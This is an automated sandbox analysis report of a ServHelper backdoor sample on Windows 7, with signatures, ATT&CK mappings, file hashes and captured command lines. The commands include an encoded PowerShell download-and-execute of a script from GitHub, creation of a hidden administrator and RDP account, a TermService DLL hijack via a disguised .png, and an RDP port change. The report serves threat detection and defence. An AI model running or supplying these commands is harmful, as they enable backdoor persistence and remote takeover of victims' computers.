servhelper | d541b9ff1fd68818abd9d0f70966e97beaab82dd6bb32d66566fbd6d657fbfd8

Analysis

max time kernel
138s
max time network
122s
platform
windows7_x64
resource
win7-20231129-en
resource tags

arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
submitted
01-02-2024 05:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

86178014e457120d9dc6f6e27453338c.exe
Size

6.0MB
MD5

86178014e457120d9dc6f6e27453338c
SHA1

16ab38c0e9c4516532f9d111523e948a6311bfc0
SHA256

d541b9ff1fd68818abd9d0f70966e97beaab82dd6bb32d66566fbd6d657fbfd8
SHA512

746417e600a1a0cb157f6a74422140b1ed75767a7f47f208c46feadac1dcf845637ce986a11cd7ed3f07e9782ff736b8da448057b0eb65cc50df30baa500bf75
SSDEEP

49152:+G6we2P/3W01/65p9CepD70BIme1AWwYg015Y5vl5zytq9oB5JSZZSYu5q01ka2i:+32P/d/s

Score

10^/10

servhelper backdoor discovery exploit persistence trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
trojan backdoor servhelper
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 2 IoCs

flow	pid	Process
14	1620	powershell.exe
15	1620	powershell.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1021.001

Possible privilege escalation attempt 8 IoCs

exploit

pid	Process
1736	takeown.exe
676	icacls.exe
324	icacls.exe
1192	icacls.exe
724	icacls.exe
2448	icacls.exe
1060	icacls.exe
488	icacls.exe

Sets DLL path for service in the registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png"	reg.exe

Loads dropped DLL 2 IoCs

pid	Process
2972	Process not Found
2972	Process not Found

Modifies file permissions 1 TTPs 8 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
2448	icacls.exe
1060	icacls.exe
488	icacls.exe
676	icacls.exe
324	icacls.exe
1736	takeown.exe
1192	icacls.exe
724	icacls.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x00070000000147f1-116.dat	upx
behavioral1/files/0x000b0000000146c2-115.dat	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
13	raw.githubusercontent.com
14	raw.githubusercontent.com
15	raw.githubusercontent.com

Drops file in System32 directory 1 IoCs

description	ioc	Process
File created	C:\Windows\system32\rfxvmt.dll	powershell.exe

Drops file in Windows directory 9 IoCs

description	ioc	Process
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\ShellBrd	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\T448Z66DUP7XGHVWGFYT.temp	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2504	WMIC.exe

Modifies data under HKEY_USERS 4 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = b0e4733ad254da01	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
1488	reg.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
2776	powershell.exe
2112	powershell.exe
2556	powershell.exe
2856	powershell.exe
2776	powershell.exe
2776	powershell.exe
2776	powershell.exe
1620	powershell.exe

Suspicious behavior: LoadsDriver 6 IoCs

pid	Process
480	Process not Found
2972	Process not Found
2972	Process not Found
2972	Process not Found
2972	Process not Found
2972	Process not Found

Suspicious use of AdjustPrivilegeToken 19 IoCs

description	pid	Process
Token: SeDebugPrivilege	1924	86178014e457120d9dc6f6e27453338c.exe
Token: SeDebugPrivilege	2776	powershell.exe
Token: SeDebugPrivilege	2112	powershell.exe
Token: SeDebugPrivilege	2556	powershell.exe
Token: SeDebugPrivilege	2856	powershell.exe
Token: SeRestorePrivilege	676	icacls.exe
Token: SeAssignPrimaryTokenPrivilege	2504	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2504	WMIC.exe
Token: SeAuditPrivilege	2504	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2504	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2504	WMIC.exe
Token: SeAuditPrivilege	2504	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2880	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2880	WMIC.exe
Token: SeAuditPrivilege	2880	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2880	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2880	WMIC.exe
Token: SeAuditPrivilege	2880	WMIC.exe
Token: SeDebugPrivilege	1620	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1924 wrote to memory of 2776	1924	86178014e457120d9dc6f6e27453338c.exe	30
PID 1924 wrote to memory of 2776	1924	86178014e457120d9dc6f6e27453338c.exe	30
PID 1924 wrote to memory of 2776	1924	86178014e457120d9dc6f6e27453338c.exe	30
PID 2776 wrote to memory of 2476	2776	powershell.exe	31
PID 2776 wrote to memory of 2476	2776	powershell.exe	31
PID 2776 wrote to memory of 2476	2776	powershell.exe	31
PID 2476 wrote to memory of 2540	2476	csc.exe	32
PID 2476 wrote to memory of 2540	2476	csc.exe	32
PID 2476 wrote to memory of 2540	2476	csc.exe	32
PID 2776 wrote to memory of 2112	2776	powershell.exe	34
PID 2776 wrote to memory of 2112	2776	powershell.exe	34
PID 2776 wrote to memory of 2112	2776	powershell.exe	34
PID 2776 wrote to memory of 2556	2776	powershell.exe	35
PID 2776 wrote to memory of 2556	2776	powershell.exe	35
PID 2776 wrote to memory of 2556	2776	powershell.exe	35
PID 2776 wrote to memory of 2856	2776	powershell.exe	38
PID 2776 wrote to memory of 2856	2776	powershell.exe	38
PID 2776 wrote to memory of 2856	2776	powershell.exe	38
PID 2776 wrote to memory of 1736	2776	powershell.exe	94
PID 2776 wrote to memory of 1736	2776	powershell.exe	94
PID 2776 wrote to memory of 1736	2776	powershell.exe	94
PID 2776 wrote to memory of 324	2776	powershell.exe	93
PID 2776 wrote to memory of 324	2776	powershell.exe	93
PID 2776 wrote to memory of 324	2776	powershell.exe	93
PID 2776 wrote to memory of 676	2776	powershell.exe	92
PID 2776 wrote to memory of 676	2776	powershell.exe	92
PID 2776 wrote to memory of 676	2776	powershell.exe	92
PID 2776 wrote to memory of 488	2776	powershell.exe	91
PID 2776 wrote to memory of 488	2776	powershell.exe	91
PID 2776 wrote to memory of 488	2776	powershell.exe	91
PID 2776 wrote to memory of 1060	2776	powershell.exe	90
PID 2776 wrote to memory of 1060	2776	powershell.exe	90
PID 2776 wrote to memory of 1060	2776	powershell.exe	90
PID 2776 wrote to memory of 1192	2776	powershell.exe	39
PID 2776 wrote to memory of 1192	2776	powershell.exe	39
PID 2776 wrote to memory of 1192	2776	powershell.exe	39
PID 2776 wrote to memory of 2448	2776	powershell.exe	89
PID 2776 wrote to memory of 2448	2776	powershell.exe	89
PID 2776 wrote to memory of 2448	2776	powershell.exe	89
PID 2776 wrote to memory of 724	2776	powershell.exe	88
PID 2776 wrote to memory of 724	2776	powershell.exe	88
PID 2776 wrote to memory of 724	2776	powershell.exe	88
PID 2776 wrote to memory of 1652	2776	powershell.exe	87
PID 2776 wrote to memory of 1652	2776	powershell.exe	87
PID 2776 wrote to memory of 1652	2776	powershell.exe	87
PID 2776 wrote to memory of 1488	2776	powershell.exe	41
PID 2776 wrote to memory of 1488	2776	powershell.exe	41
PID 2776 wrote to memory of 1488	2776	powershell.exe	41
PID 2776 wrote to memory of 588	2776	powershell.exe	40
PID 2776 wrote to memory of 588	2776	powershell.exe	40
PID 2776 wrote to memory of 588	2776	powershell.exe	40
PID 2776 wrote to memory of 1916	2776	powershell.exe	86
PID 2776 wrote to memory of 1916	2776	powershell.exe	86
PID 2776 wrote to memory of 1916	2776	powershell.exe	86
PID 1916 wrote to memory of 1920	1916	net.exe	85
PID 1916 wrote to memory of 1920	1916	net.exe	85
PID 1916 wrote to memory of 1920	1916	net.exe	85
PID 2776 wrote to memory of 452	2776	powershell.exe	84
PID 2776 wrote to memory of 452	2776	powershell.exe	84
PID 2776 wrote to memory of 452	2776	powershell.exe	84
PID 452 wrote to memory of 1056	452	cmd.exe	83
PID 452 wrote to memory of 1056	452	cmd.exe	83
PID 452 wrote to memory of 1056	452	cmd.exe	83
PID 1056 wrote to memory of 1716	1056	cmd.exe	42

C:\Users\Admin\AppData\Local\Temp\86178014e457120d9dc6f6e27453338c.exe
"C:\Users\Admin\AppData\Local\Temp\86178014e457120d9dc6f6e27453338c.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1924
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2776
- - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\w1nfol9f.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2476
  - - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1759.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC1758.tmp"
      4⤵
      PID:2540
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2112
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2556
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2856
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1192
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    3⤵
    PID:588
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
    3⤵
    - Sets DLL path for service in the registry
    - Modifies registry key
    PID:1488
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
    3⤵
    PID:1508
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:452
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1916
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    3⤵
    PID:1652
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:724
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2448
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1060
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:488
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:676
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:324
- - C:\Windows\system32\takeown.exe
    "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1736
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
    3⤵
    PID:1584
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    3⤵
    PID:956

C:\Windows\system32\net.exe
net start rdpdr
1⤵
PID:1716
- C:\Windows\system32\net1.exe
  C:\Windows\system32\net1 start rdpdr
  2⤵
  PID:2000

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start TermService
1⤵
PID:1984

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
1⤵
PID:1828

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" GLTGRJAG$ /ADD
1⤵
PID:856
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" GLTGRJAG$ /ADD
  2⤵
  PID:284

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc qlQhlGh3
1⤵
PID:2700

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
1⤵
- Detects videocard installed
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2504

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
PID:1900

C:\Windows\System32\Wbem\WMIC.exe
wmic CPU get NAME
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2880

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1620

C:\Windows\system32\cmd.exe
cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:2744

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:3028

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:2528

C:\Windows\system32\net.exe
net.exe user WgaUtilAcc qlQhlGh3
1⤵
PID:2216

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc qlQhlGh3
1⤵
PID:888

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
1⤵
PID:2004

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
1⤵
PID:1908

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
1⤵
PID:2180

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" GLTGRJAG$ /ADD
1⤵
PID:1280

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
1⤵
PID:616

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
1⤵
PID:716

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
1⤵
PID:112

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc qlQhlGh3 /add
1⤵
PID:1960

C:\Windows\system32\net.exe
net.exe user WgaUtilAcc qlQhlGh3 /add
1⤵
PID:2256

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc qlQhlGh3 /add
1⤵
PID:1956

C:\Windows\system32\net.exe
net.exe user WgaUtilAcc 000000 /del
1⤵
PID:300

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 000000 /del
1⤵
PID:1548

C:\Windows\system32\net.exe
net start TermService
1⤵
PID:2044

C:\Windows\system32\cmd.exe
cmd /c net start TermService
1⤵
PID:2956

C:\Windows\system32\cmd.exe
cmd /c net start rdpdr
1⤵
- Suspicious use of WriteProcessMemory
PID:1056

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
1⤵
PID:1920

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Remote Services

T1021

Remote Desktop Protocol

T1021.001

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES1759.tmp

Filesize
1KB

MD5
a8bf99727ed673562d8a8d36ebf397d1

SHA1
72dd16ef1b2ff186900748afb868549851da3bf7

SHA256
fbc17686635513866f8de04efef3fa96c110a313d1e22ad25d9573cfb0fd6732

SHA512
ee25fd99effb118d30754765d7d1cdedf281aeb40cff0baff2c069c6fa5e6975ab564d02a3991cfff7d72e894d48f53f661a63fac1c0d78c179cdd93c792c2f7

Download Submit
C:\Users\Admin\AppData\Local\Temp\ready.ps1

Filesize
1KB

MD5
3447df88de7128bdc34942334b2fab98

SHA1
519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb

SHA256
9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9

SHA512
2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f

Download Submit
C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1

Filesize
1.6MB

MD5
922e47b1d5648188b75af92bea85fea4

SHA1
b0e026430d3abd9671792f52cffd8a9c5c28c253

SHA256
c484f8b5962b514220917521e75acb1de160279b8aadc4185304faf0bddbb1dd

SHA512
3e350e99e7b44d1879f768c106a2f6a17effa57d450198c5040ba7993113f49867f727e77282ae09fbb948f70cbd812b15986a571dc13b1bbd45e2f2d66f9401

Download Submit
C:\Users\Admin\AppData\Local\Temp\w1nfol9f.dll

Filesize
3KB

MD5
e809a5d603cf436ef4297337061dfcb0

SHA1
2addeafa03a2553e92e9cf02505bec06cf11117a

SHA256
fd2bb929fb1b99be7337edce9d61a5376abadbf20acbc7e88e359ea316197e5c

SHA512
949881451d54e62fe7157fb6a6756e37970bb108a9018619c3f570a1c74fae1cda2420734dbbd3eccafda174ee5b038e771f087fc09cecf7f2479025dd123fae

Download Submit
C:\Users\Admin\AppData\Local\Temp\w1nfol9f.pdb

Filesize
7KB

MD5
c228eda90253f43e37667901c9a3491a

SHA1
aea312c26a20aeb9cf6c423c7f9731136792d3a4

SHA256
25f5a0aea068af6337038d7fae83b5a86e2a855fabaa6e597d9aecc3d93b8bb4

SHA512
048da3e9e687b4cf9de087706bf81c3f882673b68811a5374942291ed66e685a39e81132447b70c3775b7cc7180e088fc7f21c241a1167da434d86126d7ff033

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\44AELSKPRCMOKRXIGUOJ.temp

Filesize
7KB

MD5
1ec058fa5291620cdc90ab6f8f5616c1

SHA1
e01dd8b2df445087b4a9c698573a3f000711e205

SHA256
fe31f492e498bac6263eaaeca66ad345442ca6118fef16cab6af39bb0e292f7a

SHA512
4a1c77beabb86061285e05107b833b611ed1f1737b7b3ea0ddc0f14f9dac3dda349e9a47eef3ba764ad54d6631aa201ba51a0cc4d72cb7e15b1929eed66e1b2b

Download Submit
C:\Windows\system32\rfxvmt.dll

Filesize
40KB

MD5
dc39d23e4c0e681fad7a3e1342a2843c

SHA1
58fd7d50c2dca464a128f5e0435d6f0515e62073

SHA256
6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

SHA512
5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC1758.tmp

Filesize
652B

MD5
e940bbe786012c98aef00b26d4118a38

SHA1
78dad1ef297dbd8666846460ca5dcf4b4bb4430c

SHA256
37a0e7504c22fe8fad150e03c99e09a0246530f5f73887429ab2d05f71d7fe0e

SHA512
42a766f24cea7ca1b6921b697a5dd70e84ccad3efea9cda212eb38b8e41a91dce5a3eac87c2298deda32196e130d2b0ea02983448d04e9b11142e1fa394cb9db

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\w1nfol9f.0.cs

Filesize
424B

MD5
4864fc038c0b4d61f508d402317c6e9a

SHA1
72171db3eea76ecff3f7f173b0de0d277b0fede7

SHA256
0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84

SHA512
9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\w1nfol9f.cmdline

Filesize
309B

MD5
27cdc57223366faac8967d14587cf701

SHA1
a95dd103a243797b032e28d205d4d6ecad0482e0

SHA256
4ce8e79c8bcc82f1d7beaaa3ca6d009b3313db5d001357ddcbcf51609da09fcc

SHA512
6d7cf63ace471dc813b01989c4f8853842c8ad604be2b316598a367b36c23bff1248dffdedf44f4c018b69a86c88472736d43f27b0c7b55e7e2b5cf0ac29d6cd

Download Submit
\Windows\Branding\mediasrv.png

Filesize
60KB

MD5
615f99f0e93e2cc4c6a3a572835fd63d

SHA1
c383f93e9a47adc4d4b265fadfcc3feaf0980a91

SHA256
bc0a2d80569c16b63f59d629c91bfa40f76247e39c2a41dbffb0e41d1eea9ee8

SHA512
dd1196a3067f740be9c8d3cbcfcb7ec511f77daf3ba28929ef8e989597d7a9de5a59e990a7edda5491ef75413967c7db42e6941ec51523428f7fd6a8353f21ba

Download Submit
\Windows\Branding\mediasvc.png

Filesize
116KB

MD5
507a1f2ba0ca07bf4e341c91d90c9700

SHA1
f882ce01186d075dfbc446dbb51b1daec2a0afeb

SHA256
a026c4bc693a601d69b433ac5f07d2e7586f32d98d89ccf9a0850bd280ddf80e

SHA512
b453e44816b819bfd24e40ff26e4c66cf33d78b288e343e7b132ac67f8c5704a8053fa3d97af0540dcbfcc283b707108bf77769bd7e3726f35d530855ee09833

Download Submit
memory/1620-123-0x0000000001540000-0x00000000015C0000-memory.dmp

Filesize
512KB

Download
memory/1620-122-0x000007FEEE4D0000-0x000007FEEEE6D000-memory.dmp

Filesize
9.6MB

Download
memory/1620-124-0x000007FEEE4D0000-0x000007FEEEE6D000-memory.dmp

Filesize
9.6MB

Download
memory/1620-126-0x0000000001540000-0x00000000015C0000-memory.dmp

Filesize
512KB

Download
memory/1620-128-0x000007FEEE4D0000-0x000007FEEEE6D000-memory.dmp

Filesize
9.6MB

Download
memory/1620-125-0x0000000001540000-0x00000000015C0000-memory.dmp

Filesize
512KB

Download
memory/1620-127-0x0000000001540000-0x00000000015C0000-memory.dmp

Filesize
512KB

Download
memory/1620-129-0x0000000001540000-0x00000000015C0000-memory.dmp

Filesize
512KB

Download
memory/1924-3-0x00000000417E0000-0x0000000041860000-memory.dmp

Filesize
512KB

Download
memory/1924-65-0x00000000417E0000-0x0000000041860000-memory.dmp

Filesize
512KB

Download
memory/1924-51-0x00000000417E0000-0x0000000041860000-memory.dmp

Filesize
512KB

Download
memory/1924-2-0x00000000417E0000-0x0000000041860000-memory.dmp

Filesize
512KB

Download
memory/1924-4-0x00000000417E0000-0x0000000041860000-memory.dmp

Filesize
512KB

Download
memory/1924-1-0x000007FEF59F0000-0x000007FEF63DC000-memory.dmp

Filesize
9.9MB

Download
memory/1924-32-0x000007FEF59F0000-0x000007FEF63DC000-memory.dmp

Filesize
9.9MB

Download
memory/1924-0-0x0000000041C80000-0x00000000420A6000-memory.dmp

Filesize
4.1MB

Download
memory/2112-62-0x000007FEEE4D0000-0x000007FEEEE6D000-memory.dmp

Filesize
9.6MB

Download
memory/2112-64-0x0000000002380000-0x0000000002400000-memory.dmp

Filesize
512KB

Download
memory/2112-63-0x0000000002380000-0x0000000002400000-memory.dmp

Filesize
512KB

Download
memory/2112-67-0x0000000002380000-0x0000000002400000-memory.dmp

Filesize
512KB

Download
memory/2112-66-0x0000000002380000-0x0000000002400000-memory.dmp

Filesize
512KB

Download
memory/2112-61-0x0000000002380000-0x0000000002400000-memory.dmp

Filesize
512KB

Download
memory/2112-68-0x000007FEEE4D0000-0x000007FEEEE6D000-memory.dmp

Filesize
9.6MB

Download
memory/2112-60-0x000007FEEE4D0000-0x000007FEEEE6D000-memory.dmp

Filesize
9.6MB

Download
memory/2556-76-0x000007FEEE4D0000-0x000007FEEEE6D000-memory.dmp

Filesize
9.6MB

Download
